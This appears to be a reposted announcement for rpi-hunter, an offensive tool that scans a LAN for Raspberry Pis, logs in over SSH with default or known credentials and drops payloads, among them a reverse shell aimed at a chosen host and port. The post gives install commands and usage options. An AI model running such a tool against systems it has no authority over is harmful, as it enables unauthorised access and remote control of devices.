Rpi-Hunter – Automate Discovering And Dropping Payloads On LAN Raspberry Pi’s Via SSH

Automate discovering and dropping payloads on LAN Raspberry Pi’s via ssh.rpi-hunter is useful when there are multiple Raspberry Pi’s on your LAN with default or known credentials, in order to automate sending commands/payloads to them.GUIDE:InstallationInstall dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpassDownload rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunterNavigate to rpi-hunter: cd ./rpi-hunterMake rpi-hunter.py executable: chmod +x rpi-hunter.pyOne line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.pyUsageusage: rpi-hunter.py [-h] [–list] [–no-scan] [-r IP_RANGE] [-f IP_LIST] [-c CREDS] [–payload PAYLOAD] [-H HOST] [-P PORT] [–safe] [-q]optional arguments: -h, –help show this help message and exit –list List available payloads –no-scan Disable ARP scanning -r IP_RANGE IP range to scan -f IP_LIST IP list to use (Default ./scan/RPI_list) -u UNAME Username to use when ssh’ing -c CREDS Password to use when ssh’ing –payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or ‘whoami’] -H HOST (If using reverse_shell payload) Host for reverse shell -P PORT (If using reverse_shell payload) Port for reverse shell –safe Print sshpass command, but don’t execute it -q Don’t print bannerExample usage: ./rpi-hunter.py -r –payload reverse_shell -H -P 1337Run ./rpi-hunter.py –list to see avalible payloads.Payloads can be specified by the payload name from –list or as raw inputex. –payload reverse_shell or –payload [your cli command here]Download Rpi-Hunter

Link: http://feedproxy.google.com/~r/PentestTools/~3/cPYvAMXfbJo/rpi-hunter-automate-discovering-and.html